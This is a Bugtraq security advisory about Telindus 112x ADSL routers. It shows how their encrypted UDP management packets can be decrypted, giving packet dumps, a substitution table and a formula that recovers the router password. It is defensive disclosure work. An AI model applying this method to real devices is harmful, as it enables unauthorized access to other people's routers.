Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Weak Encryption Scheme in Telindus 112x

From: <eflorio () edmaster it>
Date: 23 Feb 2003 11:42:36 -0000


[-----------------------------------------------------------------------]
Product Name: TELINDUS ADSL ROUTER 112x
Severity    : Low Risk
Remote      : No
Category    : Trivial encryption scheme can reveal router system password
Exploit     : No
Vendor URL  : http://www.telindus.com
Author      : Elia Florio
Discov.-Date: December 10, 2002
Status      : Telindus was contacted in December, 2002
[-----------------------------------------------------------------------]

INTRO:
An old security problem for Telindus 112x series (and Arescom NetDSL 1000
too) is well documented here:

http://www.tigerteam.it/files/telindus-advisory.txt       (english)
http://www.tigerteam.it/files/telindus-advisory.IT.txt    (italian)

There is a new exploit to crack router password, partially-based on 
this old problem, which was fixed by Telindus introducing a new 
firmware release (6.0.x), where UDP packets over 9833 port 
(containing plain-text password) are encrypted, to ensure product 
security.

However, after some studies, I discovered that the encryption scheme is 
trivial and can be broken using some information which the router itself 
reveals (the router name) to the user. 

NOTE:
The encryption scheme was succesfully decrypted on 2 routers carried 
by different ISP : MATAV (Hungary) and Telecom (Italy), both with 6.0.x
firmware.


[---------------------------------------------------------------------]

PROOF OF CONCEPT:

Using a sniffer I capture a packet (encrypted) from a 1124 router and
compare it with another packet (unencrypted) taken from another router, 
with has the old firmware (< 6.0.x). This procedure (how-to-capture-
packet) was explained in a previous security advisory (by others) and is 
based on UDP sniffing over the 9833 port while "Telindus 9100 M. 
Application" is trying to contact the router over the LAN.

                            CYPHER-TEXT

0100  00 03 02 00 08 00 00 A2 A3 2B 63 4B 73 23 AB 99    .......¢£+cKs#«TM
0110  02 0A 22 9A 61 02 93 7B AB A3 2B 90 08 08 00 2B    .."sa."{«£+·...+
0120  6B 7B AB 9B 28 08 10 01 92 72 22 99 89 91 B1 82    k{«>(...'r"TM`±,
0130  42 29 6A A2 62 49 61 03 B3 2B 91 01 B1 71 81 71    B)j¢bIa.³+`.±q·q
0140  91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 89 C9    `¹Ú£«).S«a.TM·.É
0150  D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01    ѱÑTM±.`···.~...
0160  E0 08 98 00 30 00 2E C0 9F 0A 88 08 B0 00 30 00    à.~.0..ÀY.^.°.0.
0170  85 38 9A 64 0A 00 18 00 10 00 02 00 20 00 10 00    ...8sd........ ..
0180  00 09 30 00 00 09 38 00 00 09 40 00 00 09 80 00    ..0...8...@....
0190  10 00 10 0A 20 00 00 08 20 00 10 00 00 10 50 00    .... ... .....P.
01A0  10 00 00 0A 30 00 10 00 00 0A 48 00 20 00 00 00    ....0.....H. ...
01B0  00 0A 88 00 02 10 28 00 02 11 10 00 00 20 40 00    ..^...(...... @.

                            PLAIN-TEXT

0100  00 03 00 01 01 00 00 05-44 53 4C 30 30 01 01 00   ........DSL00...
0110  0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02   .1111111111111..
0120  00 32 4E 44 31 30 36 30-56 45 2D 54 4C 49 2C 20   .2ND1060VE-TLI,
0130  76 65 72 20 35 2E 33 2E-31 31 42 3B 54 68 75 20   ver 5.3.11B;Thu
0140  44 65 63 20 20 36 20 31-36 3A 33 36 3A 33 33 20   Dec  6 16:36:33
0150  32 30 30 31 01 33 00 02-00 3C 01 13 00 06 00 60   2001.3...<.....`
0160  6C 1D BD 7E 01 16 00 06-00 00 86 60 62 F7 04 08   l..~.......`b...
0170  00 02 00 01 04 15 00 02-00 FF 01 0D 00 04 00 00   ................
0180  00 00 01 0E 00 04 00 00-00 00 01 14 00 02 00 00   ................
0190  40 03 00 02 00 00 40 04-00 02 00 00 01 26 00 00   @.....@......&..
01A0  01 27 00 00 01 28 00 00-01 30 00 02 00 02 01 44   .'...(...0.....D
01B0  00 00 42 05 00 00 42 22-00 00 04 18 00 00 08 FF   ..B...B"........

Both payloads begin with "00 03 xx xx xx 00 00" bytes sequence.

In the plain packet we can read the router name and the password: the 
beginning of a text string has an important byte, which stores the string 
length:

05-44 53 4C 30 30 01 01 00
^^----------------------------------> lenght of string "DSL00"

0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02 00
^^----------------------------------> lenght of string "1111111111111"

I suppose that "0x 0x 00" is a kind of termination sequence
for <router name> and <password> fields.

Now look at the encrypted packet: because the total length is similar
to that of the plain packet (>200 bytes), I suppose that "A2" is now a 
crypted lenght byte, so the router name field begins after this byte.

But I know the router name, because Telindus 9100 M. Application
shows it to me during the connection test with router.
In this case it was "Telindus ADSL Router",very long! I think that is 
enough to begin a crypto-analytic attack over the packet.


"Telindus ADSL Router" [20 byte = 14hex]  crypto-lenght=A2

T  e  l  i  n  d  u  s     A  D  S  L     R  o  u  t  e  r 
A3 2B 63 4B 73 23 AB 99 02 0A 22 9A 61 02 93 7B AB A3 2B 90  encrypted
54 65 6C 69 6E 64 75 73 20 41 44 53 4C 20 52 6F 75 74 65 72  plain ASCII


Looking this, I try to suppose that:

1) the encryption scheme is based on a fixed crypto system 
   ("e", "u", "t" are encrypted in same way in the text)

2) there is a special encryption for stop/mark bytes between 
   words (add -2 or -3 to final char R=93 / r=90 ????)

3) the encryption scheme is case sensitive

Trying to write a crypto table, I can notice that every letter is coded 
from the previous adding "8" to crypto-byte. For example r=93, then 
s=9B...

CRYPTO TABLE (hex codes)
-------------------------------------
CHAR    CRYPT    PLAIN
a       0B       61
b       13       62
c       1B       63
d       23       64
e       2B       65
f       33       66
g       3B       67
h       43       68
i       4B       69
j       53       6A
k       5B       6B
l       63       6C
m       6B       6D
n       73       6E
o       7B       6F
p       83       70
q       8B       71
r       93       72
s       9B       73
t       A3       74
u       AB       75
v       B3       76
w       BB       77
y       C3       78
x       CB       79
z       D3       7A
... 
1       89       31
2       91       32
3       98       33
...

I think that the encryption function is very similar to this :

ENCRYPT(x) = x*8 + int(x/20h) - (int(x/20h))*100h

For example ("q" = 71h)

ENCRYPT(71h) = 71h*8 + 71h/20h - (71h/20H)*100H = 388 + 3 - 300 = 8Bh

There are some encryption variants for blank space, capital
and the last letters of words.

Now, where is the router password in the encrypted packet?
After 20 bytes (the router name length in this case) there is "08 08 00", 
probably a field marker, then there is 2B, which is 
the crypto-lentgth of password. 

The encrypted password-string begins there.

Using the table, I can unmask the real router password:

   m  o  u  s  e  
2B 6B 7B AB 9B 28 08 10 01 
^^----------------------------------crypto length of password


Other informations can be also decrypted :

N  D  S  1  2  6  0  H  E  -  T  L  I
72 22 99 89 91 B1 82 42 29 6A A2 62 49 61 03 

v  e  r     6  .  0  .  2  7     T  u  e     J  u  l     3  0     
B3 2B 91 01 B1 71 81 71 91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 

1  9  :  1  6  :  3  6     2  0  0  2
89 C9 D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01

[----------------------------------------------------------------------]

Copyrigth Elia Florio
Security Researcher - Italy
"ioProgrammo" (www.edmaster.it/ioprogrammo)
(eflorio () edmaster it)
Previous By Date Next
Previous By Thread Next

Current thread: